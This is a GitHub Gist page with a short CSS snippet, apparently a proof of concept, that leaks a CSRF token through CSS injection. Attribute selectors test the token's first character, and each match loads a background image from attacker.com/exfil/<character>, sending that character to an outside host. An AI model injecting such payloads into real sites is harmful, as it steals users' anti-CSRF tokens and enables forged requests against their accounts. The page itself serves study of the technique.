Created
July 25, 2018 07:04
-
-
Save d0nutptr/331ade86213a7252d1585c04cdada0e6 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
input[name=csrf][value^=a]{ | |
background-image: url(https://attacker.com/exfil/a); | |
} | |
input[name=csrf][value^=b]{ | |
background-image: url(https://attacker.com/exfil/b); | |
} | |
/* ... */ | |
input[name=csrf][value^=9]{ | |
background-image: url(https://attacker.com/exfil/9); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment